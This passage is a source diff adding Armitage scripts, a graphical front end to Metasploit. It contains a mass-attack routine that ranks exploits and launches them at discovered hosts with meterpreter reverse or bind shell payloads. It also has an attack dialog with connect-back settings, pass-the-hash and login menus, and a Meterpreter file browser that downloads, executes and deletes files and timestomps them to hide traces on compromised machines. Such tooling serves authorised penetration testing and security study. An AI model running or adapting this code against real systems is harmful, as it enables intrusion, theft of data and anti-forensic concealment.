+		# now crawl through %results and start hacking each host in turn
+		local('$host $exploits @allowed $ex $os $port $exploit @attacks %dupes $e $p');
+
+		# filter the attacks...
+		foreach $host => $exploits (%results2) {
+			%dupes = %();
+			@allowed = getOS(getHostOS($host));
+
+			foreach $e ($exploits) {
+				($ex, $p) = $e;
+				($os, $port, $exploit) = split('/', $ex);
+				if ($os in @allowed && $ex !in %dupes) {
+					push(@attacks, @("$host", "$ex", best_payload($host, $ex, iff($ex in @always_reverse)), $p, %exploits[$ex]));
+					if ($p eq "139") {
+						push(@attacks, @("$host", "$ex", best_payload($host, $ex, iff($ex in @always_reverse)), 445, %exploits[$ex]));
+					}
+					%dupes[$ex] = 1;
+				}
+			}
+			[[$console getWindow] append: "\t[ $+ $host $+ ] Found " . size($exploits) . " exploits\n" ];
+		}
+
+		[[$console getWindow] append: "\n2) Sorting Exploits\n"];
+
+		# now sort them, so the best ones are on top...
+		sort({
+			local('$a $b');
+			if ($1[1] !in %exploits) {
+				return 1;
+			}
+			if ($2[1] !in %exploits) {
+				return -1;
+			}
+
+			$a = %exploits[$1[1]];
+			$b = %exploits[$2[1]];
+
+			if ($a['rankScore'] eq $b['rankScore']) {
+				return $b['date'] <=> $a['date'];
+			}
+
+			return $b['rankScore'] <=> $a['rankScore'];
+		}, @attacks);
+
+		[[$console getWindow] append: "\n3) Launching Exploits\n\n"];
+
+		# now execute them...
+		local('$progress');
+		$progress = [new ProgressMonitor: $null, "Launching Exploits...", "...", 0, size(@attacks)];
+
+		thread(lambda({
+			local('$host $ex $payload $x $rport %wait');
+			while (size(@attacks) > 0 && [$progress isCanceled] == 0) {
+				($host, $ex, $payload, $rport) = @attacks[0];
+
+				# let's throttle our exploit/host velocity a little bit.
+				if ((ticks() - %wait[$host]) > 1250) {
+					yield 250;
+				}
+				else {
+					yield 1500;
+				}
+
+				[$progress setNote: "$host $+ : $+ $rport ( $+ $ex $+ )"];
+				[$progress setProgress: $x + 0];
+				call_async($client, "module.execute", "exploit", $ex, %(PAYLOAD => $payload, RHOST => $host, LHOST => $MY_ADDRESS, LPORT => randomPort() . '', RPORT => "$rport", TARGET => '0', SSL => iff($rport == 443, '1')));
+				%wait[$host] = ticks();
+				$x++; 
+				@attacks = sublist(@attacks, 1);
+			}
+			[$progress close];
+
+			[[$console getWindow] append: "\n\n4) Listing sessions\n\n"];
+
+			[$console addCommand: $null, "sessions -v"];
+			[$console start];
+			[$console stop];
+		}, \@attacks, \$progress, \$console));
+	}, \$console));
+}
+
+# choose a payload...
+# best_client_payload(exploit, target) 
+sub best_client_payload {
+	local('$os');
+	$os = split('/', $1)[0];
+
+	if ($os eq "windows" || "*Windows*" iswm $2) {
+		return "windows/meterpreter/reverse_tcp";
+	}
+	else if ("*Generic*Java*" iswm $2) {
+		return "java/meterpreter/reverse_tcp";
+	}
+	else if ("*Mac*OS*PPC*" iswm $2 || ($os eq "osx" && "*PPC*" iswm $2)) {
+		return "osx/ppc/shell/reverse_tcp";
+	}
+	else if ("*Mac*OS*x86*" iswm $2 || "*Mac*OS*" iswm $2 || "*OS X*" iswm $2 || $os eq "osx") {
+		return "osx/x86/vforkshell/reverse_tcp";
+	}
+	else {
+		return "generic/shell_reverse_tcp";
+	}
+}
+
+sub isIPv6 {
+	local('$inet $exception');
+	try {
+		$inet = [java.net.InetAddress getByName: $1];
+		if ($inet isa ^java.net.Inet6Address) {
+			return 1;
+		}
+	}
+	catch $exception { }
+	return $null;
+}
+
+# choose a payload...
+# best_payload(host, exploit, reverse preference)
+sub best_payload {
+	local('$compatible $os $win');
+	$compatible = call($client, "module.compatible_payloads", $2)["payloads"];
+	$os = iff($1 in %hosts, %hosts[$1]['os_name']);
+	$win = iff($os eq "Windows" || "windows" isin $2);
+
+	if ($3) {
+		if ($win && "windows/meterpreter/reverse_tcp" in $compatible) {
+			return "windows/meterpreter/reverse_tcp";
+		}
+		else if ($win && "windows/shell/reverse_tcp" in $compatible) {
+			return "windows/shell/reverse_tcp";
+		}
+		else if ("java/meterpreter/reverse_tcp" in $compatible) {
+			return "java/meterpreter/reverse_tcp";
+		}
+		else if ("java/shell/reverse_tcp" in $compatible) {
+			return "java/shell/reverse_tcp";
+		}
+		else if ("java/jsp_shell_reverse_tcp" in $compatible) {
+			return "java/jsp_shell_reverse_tcp";
+		}
+		else if ("php/meterpreter_reverse_tcp" in $compatible) {
+			return "php/meterpreter_reverse_tcp";
+		}
+		else {
+			return "generic/shell_reverse_tcp";
+		}
+	}
+	
+	if ($win && "windows/meterpreter/bind_tcp" in $compatible) {
+		if (isIPv6($1)) {
+			return "windows/meterpreter/bind_ipv6_tcp";
+		}
+		else {
+			return "windows/meterpreter/bind_tcp";
+		}
+	}
+	else if ($win && "windows/shell/bind_tcp" in $compatible) {
+		if (isIPv6($1)) {
+			return "windows/shell/bind_ipv6_tcp";
+		}
+		else {
+			return "windows/shell/bind_tcp";
+		}
+	}
+	else if ("java/meterpreter/bind_tcp" in $compatible) {
+		return "java/meterpreter/bind_tcp";
+	}
+	else if ("java/shell/bind_tcp" in $compatible) {
+		return "java/shell/bind_tcp";
+	}
+	else if ("java/jsp_shell_bind_tcp" in $compatible) {
+		return "java/jsp_shell_bind_tcp";
+	}
+	else {
+		return "generic/shell_bind_tcp";
+	}
+}
+
+sub addAdvanced {
+	local('$d');
+	$d = [new JCheckBox: " Show advanced options"];
+	[$d addActionListener: lambda({
+		[$model showHidden: [$d isSelected]];
+		[$model fireListeners];
+	}, \$model, \$d)];
+	return $d;
+}
+
+#
+# pop up a dialog to start our attack with... fun fun fun
+#
+sub attack_dialog {
+	local('$dialog $north $center $south $center @targets $combobox $label $textarea $scroll $model $key $table $sorter $col $d $b $c $button $x $value');
+
+	$dialog = dialog("Attack " . join(', ', $3), 590, 360);
+
+	$north = [new JPanel];
+	[$north setLayout: [new BorderLayout]];
+	
+	$label = [new JLabel: $1["name"]];
+	[$label setBorder: [BorderFactory createEmptyBorder: 5, 5, 5, 5]];
+
+	[$north add: $label, [BorderLayout NORTH]];
+
+	$textarea = [new JTextArea: [join(" ", split('[\\n\\s]+', $1["description"])) trim]];
+	[$textarea setEditable: 0];
+	[$textarea setOpaque: 1];
+	[$textarea setLineWrap: 1];
+	[$textarea setWrapStyleWord: 1];
+	[$textarea setBorder: [BorderFactory createEmptyBorder: 3, 3, 3, 3]];
+	$scroll = [new JScrollPane: $textarea];
+	[$scroll setBorder: [BorderFactory createEmptyBorder: 3, 3, 3, 3]];
+
+	[$north add: $scroll, [BorderLayout CENTER]];
+
+	$model = [new GenericTableModel: @("Option", "Value"), "Option", 128];
+	[$model setCellEditable: 1];
+	foreach $key => $value ($2) {	
+		if ($key eq "RHOST") {
+			$value["default"] = join(", ", $3);
+		}
+		
+		[$model _addEntry: %(Option => $key, 
+					Value => $value["default"], 
+					Tooltip => $value["desc"], 
+					Hide => 
+						iff($value["advanced"] eq '0' && $value["evasion"] eq '0', '0', '1')
+				)
+		]; 
+	}
+	[$model _addEntry: %(Option => "LHOST", Value => $MY_ADDRESS, Tooltip => "Address (for connect backs)", Hide => '0')];
+	[$model _addEntry: %(Option => "LPORT", Value => randomPort(), Tooltip => "Bind meterpreter to this port", Hide => '0')];
+
+	$table = [new ATable: $model];
+	$sorter = [new TableRowSorter: $model];
+        [$sorter toggleSortOrder: 0];
+	[$table setRowSorter: $sorter];
+	addFileListener($table, $model);
+
+	local('$TABLE_RENDERER');
+	$TABLE_RENDERER = tableRenderer($table, $model);
+
+	foreach $col (@("Option", "Value")) {
+		[[$table getColumn: $col] setCellRenderer: $TABLE_RENDERER];
+	}
+
+	$center = [new JScrollPane: $table];
+	
+	$south = [new JPanel];
+	[$south setLayout: [new BoxLayout: $south, [BoxLayout Y_AXIS]]];
+	#[$south setLayout: [new GridLayout: 4, 1]];
+	
+	$d = addAdvanced(\$model);
+
+	$combobox = targetsCombobox($1);
+
+	$b = [new JCheckBox: " Use a reverse connection"];
+
+	if ($4 in @always_reverse) {
+		[$b setSelected: 1];
+	}
+
+	$c = [new JPanel];
+	[$c setLayout: [new FlowLayout: [FlowLayout CENTER]]];
+
+	$button = [new JButton: "Launch"];
+	[$button addActionListener: lambda({
+		local('$options $host $x');
+		syncTable($table);
+
+		$options = %();
+	
+		for ($x = 0; $x < [$model getRowCount]; $x++) {
+			$options[ [$model getValueAt: $x, 0] ] = [$model getValueAt: $x, 1];
+		}
+
+		$options["TARGET"] = split(' \=\> ', [$combobox getSelectedItem])[0];
+
+		thread(lambda({
+			local('$host $hosts');
+			$hosts = split(', ', $options["RHOST"]);
+
+			foreach $host ($hosts) {
+				$options["PAYLOAD"] = best_payload($host, $exploit, [$b isSelected]);
+				$options["RHOST"] = $host;
+				if ([$b isSelected]) {
+					$options["LPORT"] = randomPort();
+				}
+
+				if (size($hosts) >= 4) {
+					call_async($client, "module.execute", "exploit", $exploit, $options);
+				}
+				else {
+					module_execute("exploit", $exploit, copy($options));
+				}
+				yield 100;
+			}
+
+			if ([$preferences getProperty: "armitage.show_all_commands.boolean", "true"] eq "false" || size($hosts) >= 4) {
+				showError("Launched $exploit at " . size($hosts) . " host" . iff(size($hosts) == 1, "", "s"));
+			}
+		}, $options => copy($options), \$exploit, \$b));
+
+		if (!isShift($1)) {
+			[$dialog setVisible: 0];
+		}
+
+		elog("exploit $exploit @ " . $options["RHOST"]);
+	}, $exploit => $4, \$model, \$combobox, \$dialog, \$b, \$table)];
+
+	[$c add: $button];
+
+	[$south add: left([new JLabel: "Targets: "], $combobox)];
+	[$south add: left($b)];
+	[$south add: left($d)];
+	[$south add: $c];
+
+	#[$dialog add: $north, [BorderLayout NORTH]];
+	local('$s');
+	$s = [new JSplitPane: [JSplitPane VERTICAL_SPLIT], $north, $center];
+	[$center setPreferredSize: [new Dimension: 0, 0]];
+	[$north setPreferredSize: [new Dimension: 480, 76]];
+	[$s resetToPreferredSizes];
+	[$s setOneTouchExpandable: 1];
+
+	[$dialog add: $s, [BorderLayout CENTER]];	
+	[$dialog add: $south, [BorderLayout SOUTH]];
+
+	[$button requestFocus];
+
+	[$dialog setVisible: 1];
+}
+
+sub min_rank {
+	return [$preferences getProperty: "armitage.required_exploit_rank.string", "great"];
+}
+
+sub host_attack_items {
+	local('%m');
+
+	# we're going to take the OS of the first host...
+	%m = exploit_menus(%hosts[$2[0]]['os_name'], %results[$2[0]]);
+
+	if (size(%m) > 0) {
+		local('$a $service $exploits $e $name $exploit');
+
+		$a = menu($1, "Attack", 'A');
+
+		foreach $service => $exploits (%m) {
+			$e = menu($a, $service, $null);
+			foreach $name => $exploit  ($exploits) {
+				item($e, $name, $null, lambda({
+					thread(lambda({ 
+						local('$a $b'); 
+						$a = call($mclient, "module.info", "exploit", $exploit);
+						$b = call($mclient, "module.options", "exploit", $exploit);
+						attack_dialog($a, $b, $hosts, $exploit);
+					}, \$exploit, \$hosts));
+				}, \$exploit, $hosts => $2));
+			}
+	
+			if ($service eq "smb") {
+				item($e, "pass the hash...", 'p', lambda(&pass_the_hash, $hosts => $2));
+			}
+
+			if (size($exploits) > 0) {
+				separator($e);
+				item($e, "check exploits...", 'c', lambda({
+					local('$result $h $console');
+					$console = createDisplayTab("Check Exploits", 1);
+		
+					$h = $hosts[0];
+					foreach $result (values($exploits)) {
+						[$console addCommand: $null, "ECHO \n\n===== Checking $result =====\n\n"];
+						[$console addCommand: $null, "use $result"];
+						[$console addCommand: $null, "set RHOST $h"];
+						[$console addCommand: $null, "check"];
+					}
+
+					[$console start];
+					[$console stop];
+				}, $hosts => $2, \$exploits));
+			}
+		}
+	}
+
+	local('$service $name @options $a $port $foo');
+
+	foreach $port => $service (%hosts[$2[0]]['services']) {
+		$name = $service['name'];
+		if ($name eq "smb" && "*Windows*" iswm getHostOS($2[0])) {
+			push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
+		}
+		else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
+			push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2)));
+		}
+		else if ($name eq "microsoft-ds") {
+			push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
+		}
+	}
+
+	if (size(@options) > 0) {
+		$a = menu($1, 'Login', 'L');
+		foreach $service (@options) {
+			($name, $foo) = $service;
+			item($a, $name, $null, $foo);
+		}
+	}
+}
+
+sub addFileListener {
+	local('$table $model $actions');
+	($table, $model, $actions) = @_; 
+
+	if ($actions is $null) {
+		$actions = %();
+	}
+
+	# set up an action to pop up a file chooser for different file type values.
+	$actions["*FILE*"] = {
+		local('$title $temp');
+		$title = "Select $1";
+		$temp = iff($2 eq "", 
+				chooseFile(\$title, $dir => $DATA_DIRECTORY), 
+				chooseFile(\$title, $sel => $2)
+			);
+		if ($temp !is $null) {
+			[$4: strrep($temp, "\\", "\\\\")];
+		}
+	};
+	$actions["NAMELIST"] = $actions["*FILE*"];
+	$actions["DICTIONARY"] = $actions["*FILE*"];
+	$actions["Template"] = $actions["*FILE*"];
+	$actions["SigningCert"] = $actions["*FILE*"];
+	$actions["SigningKey"] = $actions["*FILE*"];
+	$actions["WORDLIST"]   = $actions["*FILE*"];
+
+	# set up an action to pop up a file chooser for different file type values.
+	$actions["RHOST"] = {
+		local('$title $temp');
+		$title = "Select $1";
+		$temp = chooseFile(\$title, $dir => ".", $always => "1");
+		if ($temp !is $null) {
+			local('$handle');
+			$handle = openf($temp);
+			@addresses = readAll($handle);	
+			closef($handle);
+
+			[$4: join(", ", @addresses)];
+		}
+	};
+
+	$actions["RHOSTS"] = $actions["RHOST"];
+     
+	addMouseListener($table, lambda({
+                if ($0 eq 'mouseClicked' && [$1 getClickCount] >= 2) {
+			local('$type $row $action $change $value');
+
+			$value = [$model getSelectedValueFromColumn: $table, "Value"];
+			$type = [$model getSelectedValueFromColumn: $table, "Option"];
+			$row = [$model getSelectedRow: $table];
+
+			foreach $action => $change ($actions) {
+				if ($action iswm $type) {
+					[$change: $type, $value, $row, lambda({;
+						[$model setValueAtRow: $row, "Value", "$1"];
+						[$model fireListeners];
+					}, \$model, \$row)];
+				}
+			}
+		}
+	}, \$model, \$table, \$actions));
+}
+
+sub rankScore {
+	return %(normal => 1, good => 2, great => 3, excellent => 4)[$1];
+}

external/source/armitage/scripts/browser.sl

@@ -0,0 +1,423 @@
+#
+# File Browser (for Meterpreter)
+#
+
+import table.*;
+import tree.*;
+
+import java.awt.*;
+import java.awt.event.*;
+
+import javax.swing.*;
+import javax.swing.event.*;
+import javax.swing.table.*;
+import javax.swing.filechooser.*;
+import javax.swing.text.*;
+
+import java.io.*;
+import ui.*;
+
+global('%files %paths %attribs');
+%files = ohash();
+%paths = ohash();
+%attribs = ohasha();
+setMissPolicy(%paths, { return [new PlainDocument]; });
+setMissPolicy(%files, { return [new GenericTableModel: @("D", "Name", "Size", "Modified", "Mode"), "Name", 128]; });
+
+sub parseListing {
+	local('$model');
+	$model = %files[$1];
+
+	if ($0 eq "begin") {
+		[$model clear: 128];
+	}
+	else if ($0 eq "end") {
+		[$model fireListeners];
+	}
+	else if ($0 eq "update") {
+		if ("*Operation failed*" iswm $2) {
+			showError("$2 $+ \n\nMaybe you don't have permission to access \nthis folder? Press the Refresh button.");
+		}
+		else if ($2 ismatch 'Listing: (.*?)' || $2 ismatch 'No entries exist in (.*?)') {
+			local('$path');
+			($path) = matched();
+			[%paths[$1] remove: 0, [%paths[$1] getLength]];
+			[%paths[$1] insertString: 0, $path, $null];
+		}
+		else {
+			local('$mode $size $type $last $name');
+			($mode, $size, $type, $last, $name) = split('\s{2,}', $2);
+
+			if ($size ismatch '\d+' && $name ne "." && $name ne "..") {
+				[$model addEntry: %(Name => $name, D => $type, Size => iff($type eq "dir", "", $size), Modified => $last, Mode => $mode)];
+			}
+		}
+	}
+}
+
+%handlers["ls"] = &parseListing;
+
+# setupSizeRenderer($table, "columnname")
+sub setupSizeRenderer {
+	[[$1 getColumn: $2] setCellRenderer: [ATable getSizeTableRenderer]];
+}
+
+sub listDrives {
+	local('$queue');
+	$queue = [new armitage.ConsoleQueue: $client];
+	[$model clear: 128];
+	[$queue addCommand: $null, "use post/windows/gather/forensics/enum_drives"];
+	[$queue addCommand: $null, "set SESSION $1"];
+	[$queue addCommand: "x", "run"];
+	[$queue addListener: lambda({
+		local('@entries $entry $d $s $f');
+		@entries = parseTextTable($3, @('Device Name.', 'Type.', 'Size .bytes..'));
+		foreach $entry (@entries) {
+			$d = $entry['Device Name.'];
+			if ($d ismatch '....([A-Z]\\:)') {
+				[$model addEntry: %(Name => matched()[0], D => "dir", Size => "", Modified => "", Mode => "")];
+				$f = 1;
+			}
+		}
+
+		[$refresh setEnabled: 1];
+		[$model fireListeners];
+		[$queue stop];
+	}, \$queue, \$model, \$refresh)];
+	[$refresh setEnabled: 0];
+	[$queue start];
+}
+
+sub createFileBrowser {
+	local('$table $tree $model $panel $split $scroll1 $sorter $up $text $fsv $chooser $upload $mkdir $refresh $top $setcwd $drives');
+
+	$panel = [new JPanel];
+	[$panel setLayout: [new BorderLayout]];
+
+	$model = %files[$1];
+	$table = [new ATable: $model];
+	[$table setShowGrid: 0];
+
+        $sorter = [new TableRowSorter: $model];
+	[$sorter toggleSortOrder: 0];
+        [$table setRowSorter: $sorter];
+
+	# file size column
+        [$sorter setComparator: 2, {
+                return long($1) <=> long($2);
+        }];
+
+	# last modified column
+	[$sorter setComparator: 3, {
+		return convertDate($1) <=> convertDate($2);
+	}];
+
+	[[$table getColumn: "D"] setMaxWidth: 38];
+
+	[[$table getColumn: "D"] setCellRenderer: [ATable getFileTypeTableRenderer]];
+
+	# make sure subsequent columns do not have an icon associated with them...
+	[[$table getColumn: "Name"] setCellRenderer: [ATable getSimpleTableRenderer]];
+
+	setupSizeRenderer($table, "Size");
+
+	[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
+
+	$text = [new ATextField: %paths[$1], "", 80];
+	[$text addActionListener: lambda({
+		local('$dir');
+		$dir = [[$1 getSource] getText];
+		[$model clear: 128];
+		[$model fireListeners];
+		m_cmd($sid, "cd ' $+ $dir $+ '");
+		m_cmd($sid, "ls");
+		[[$1 getSource] setText: ""];
+	}, $sid => $1, \$model)];
+
+	# this function should be called before every browser action to keep things in sync.
+	$setcwd = lambda({
+		m_cmd($sid, "cd '" . [$text getText] . "'");
+	}, \$text, $sid => $1, $platform => $2);	
+
+	addMouseListener($table, lambda({
+		if ($0 eq 'mouseClicked' && [$1 getClickCount] >= 2) {
+			local('$model $sel');
+			$model = %files[$sid];
+			$sel = [$model getSelectedValue: $table];
+
+			[$model clear: 128];
+			[$model fireListeners];
+
+			if ("*Windows*" iswm sessionToOS($sid) && "'" !isin $sel && "'" !isin [$text getText]) {
+				if ([$text getText] eq "List Drives") {
+					m_cmd($sid, "cd ' $+ $sel $+ '");
+				}
+				else {
+					m_cmd($sid, "cd '" . [$text getText] . "\\ $+ $sel $+ '");
+				}
+			}
+			else {
+				[$setcwd];
+				m_cmd($sid, "cd \" $+ $sel $+ \"");
+			}
+
+			m_cmd($sid, "ls");
+			[$1 consume];
+		}
+		else if ([$1 isPopupTrigger]) {
+			local('$popup $model');
+			$popup = [new JPopupMenu];
+			$model = %files[$sid];
+			buildFileBrowserMenu($popup, [$model getSelectedValues: $table], convertAll([$model getRows]), \$sid, \$setcwd, \$text);
+			[$popup show: [$1 getSource], [$1 getX], [$1 getY]];
+			[$1 consume];
+		}
+	}, $sid => $1, \$table, \$setcwd, \$text));
+	
+	$fsv = [FileSystemView getFileSystemView];
+	$chooser = [$fsv getSystemIcon: [$fsv getDefaultDirectory]];
+	
+	$up = [new JButton: $chooser];
+	#[$up setPressedIcon: 
+	#	[new ImageIcon: iconToImage($chooser, 2, 2)]
+	#];
+	#[$up setBorder: [BorderFactory createEmptyBorder: 2, 2, 2, 8]];
+	#[$up setOpaque: 0];
+	#[$up setContentAreaFilled: 0];
+	[$up setToolTipText: "Go up one directory"];
+
+	[$up addActionListener: lambda({ 
+		this('$last');
+		if ((ticks() - $last) < 500) {
+			warn("Dropping cd .. -- too fast");
+			$last = ticks();
+			return;
+		}
+		$last = ticks();
+
+		[$model clear: 128];
+		[$model fireListeners];
+		if ("*Windows*" iswm sessionToOS($sid) && "'" !isin [$text getText]) {
+			m_cmd($sid, "cd '" . [$text getText] . "\\..'");
+		}
+		else {
+			[$setcwd];
+			m_cmd($sid, "cd ..");
+		}
+		m_cmd($sid, "ls");
+	}, $sid => $1, \$setcwd, \$text, \$model, \$refresh)];
+
+	# setup the whatever it's called...
+
+	$upload = [new JButton: "Upload..."];
+	[$upload addActionListener: lambda({
+		local('$file $name');
+		$file = chooseFile($always => iff($client !is $mclient));
+		$name = getFileName($file);
+		if ($file !is $null) {
+			[$setcwd];
+			if ($client !is $mclient) {
+				# some crazy gymnastics here due to how Sleep handles thread-safety...
+				local('$closure $thread');
+				$closure = lambda({
+					m_cmd($sid, "upload \" $+ $file $+ \" \" $+ $name $+ \"");
+				}, \$sid, \$name, \$file);
+				$thread = [new armitage.ArmitageThread: $closure];
+
+				fork({
+					$file = uploadBigFile($file);
+					$closure['$file'] = $file;
+					[$thread start];
+				}, \$file, \$thread, \$closure, \$mclient);
+			}
+			else {
+				m_cmd($sid, "upload \" $+ $file $+ \" \" $+ $name $+ \"");
+			}
+		}
+		# refresh?!?
+	}, $sid => $1, \$setcwd)];
+
+	$mkdir = [new JButton: "Make Directory"];
+	[$mkdir addActionListener: lambda({
+		local('$name');
+		$name = ask("Directory name:");
+		if ($name !is $null) {
+			[$setcwd];
+			m_cmd($sid, "mkdir \" $+ $name $+ \"");
+			m_cmd($sid, "ls");
+		}
+		# refresh?
+	}, $sid => $1, \$setcwd)];
+
+	$refresh = [new JButton: "Refresh"];
+	[$refresh addActionListener: lambda({
+		if ([$text getText] eq "List Drives") {
+			listDrives($sid, \$model, \$refresh);
+		}
+		else {
+			[$setcwd];
+			m_cmd($sid, "ls");
+		}
+	}, $sid => $1, \$setcwd, \$text, \$model, \$refresh)];
+
+	$drives = [new JButton: "List Drives"];
+	[$drives addActionListener: lambda({
+		listDrives($sid, \$model, \$refresh);
+		[$text setText: "List Drives"];
+	}, \$refresh, \$model, \$text, $sid => $1)];
+
+	# do the overall layout...
+
+	$top = [new JPanel];
+	[$top setBorder: [BorderFactory createEmptyBorder: 3, 3, 3, 3]];
+	[$top setLayout: [new BorderLayout]];
+	[$top add: $text, [BorderLayout CENTER]];
+	[$top add: pad($up, 0, 0, 0, 4), [BorderLayout WEST]];
+
+	[$panel add: $top, [BorderLayout NORTH]];
+
+	if ("*win*" iswm lc(sessionPlatform($1))) {
+		[$panel add: center($upload, $mkdir, $drives, $refresh), [BorderLayout SOUTH]];
+	}
+	else {
+		[$panel add: center($upload, $mkdir, $refresh), [BorderLayout SOUTH]];
+	}
+
+	[$frame addTab: "Files $1", $panel, $null, "Files " . sessionToHost($1)];
+
+	m_cmd($1, "ls");
+}
+
+sub convertDate {
+	if ($1 ismatch '\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d .*') {
+		return parseDate('yyyy-MM-dd HH:mm:ss Z', $1);
+	}
+	else {
+		return parseDate("EEE MMM dd HH:mm:ss Z yyyy", $1);
+	}
+}
+
+# automagically store timestomp attributes...
+%handlers["timestomp"] = {
+	if ($0 eq "update" && $2 ismatch '([MACE].*?)\s*: (.*)') {
+		local('$type $value $d');
+		($type, $value) = matched();
+		%attribs[["$type" trim]] = formatDate(convertDate($value), 'MM/dd/yyyy HH:mm:ss');
+	}
+};
+
+sub buildFileBrowserMenu {
+	# ($popup, [$model getSelectedValue: $table], @rows);
+	
+	# turn @rows into %(file => type)
+	local('%types');
+	map(lambda({ %types[$1["Name"]] = $1["D"]; }, \%types), $3);
+
+	# need to pass current working directory, selected file, and type
+	setupMenu($1, "file_browser", @($2, %types, [$text getText]));
+
+	item($1, "Download", 'D', lambda({ 
+		local('$f $dir @temp $tdir');
+		@temp = split('\\\\', [$text getText]);
+
+		$dir = strrep(downloadDirectory(sessionToHost($sid), join("/", @temp)), "\\", "/");
+		
+		foreach $f ($file) {
+			[$setcwd];
+			if (%types[$f] eq "dir") {
+				$tdir = strrep(downloadDirectory(sessionToHost($sid), join("/", @temp), $f), "\\", "/");
+				m_cmd($sid, "download -r \" $+ $f $+ \" \" $+ $tdir $+ \""); 
+			}
+			else {
+				m_cmd($sid, "download \" $+ $f $+ \" \" $+ $dir $+ \""); 
+			}
+		}
+		showError("Downloading:\n\n" . join("\n", $file) . "\n\nUse View -> Downloads to see files");
+		elog("downloaded " . join(", ", $file) . " from " . [$text getText] . " on " . sessionToHost($sid));
+	}, $file => $2, \$sid, \%types, \$setcwd, \$text));
+
+	item($1, "Execute", 'E', lambda({ 
+		local('$f $args');
+		[$setcwd];
+
+		$args = ask("Arguments?");
+
+		foreach $f ($file) {
+			if ($args eq "") {
+				m_cmd($sid, "execute -t -f \" $+ $f $+ \" -k"); 
+			}
+			else {
+				$args = strrep($args, '\\', '\\\\');
+				m_cmd($sid, "execute -t -f \" $+ $f $+ \" -k -a \" $+ $args $+ \""); 
+			}
+		}
+	}, $file => $2, \$sid, \$setcwd));
+
+	separator($1);
+
+	# use timestomp to make sure the date/time stamp is the same. :)
+	local('$t $key $value');
+	$t = menu($1, "Timestomp", 'T');
+	item($t, "Get MACE values", 'G', lambda({
+		[$setcwd];
+		m_cmd($sid, "timestomp \" $+ $f $+ \" -v");
+	}, \$sid, $f => $2[0], \$setcwd));
+
+	if (size(%attribs) > 0) {
+		separator($t);
+
+		foreach $key => $value (%attribs) {
+			item($t, "Set $key to $value", $null, lambda({
+				local('%switches $s $f');
+				[$setcwd];
+				foreach $f ($files) {
+					%switches = %(Modified => '-m', Accessed => '-a', Created => '-c');
+					%switches["Entry Modified"] = '-e';
+					$s = %switches[$key];
+					m_cmd($sid, "timestomp \" $+ $f $+ \" $s \" $+ $value $+ \"");
+				}
+				m_cmd($sid, "ls");
+			}, $files => $2, \$sid, $key => "$key", $value => "$value", \$setcwd));
+		}
+
+		separator($t);
+		item($t, "Set MACE values", 'S', lambda({
+			local('$f %switches $s $cmd $key $value');
+			%switches = %(Modified => '-m', Accessed => '-a', Created => '-c');
+			%switches["Entry Modified"] = '-e';
+
+			[$setcwd];
+
+			foreach $f ($files) {
+				$cmd = "timestomp \" $+ $f $+ \"";
+
+				foreach $key => $value (%attribs) {
+					$s = %switches[$key];
+					$cmd = "$cmd $s \" $+ $value $+ \"";
+				}
+
+				m_cmd($sid, $cmd);
+			}
+
+			m_cmd($sid, "ls"); 
+		}, $files => $2, \$sid, \$setcwd));
+	}
+	
+	item($1, "Delete", 'l', lambda({ 
+		local('$f');
+		[$setcwd];
+		foreach $f ($file) {
+			if (%types[$f] eq "dir") {
+				m_cmd($sid, "rmdir \" $+ $f $+ \""); 
+			}
+			else {
+				m_cmd($sid, "rm \" $+ $f $+ \""); 
+			}
+		}
+		m_cmd($sid, "ls");
+	}, $file => $2, \$sid, \%types, \$setcwd));
+}
+ 
+# Buttons:
+# [upload...] [make directory] 
+#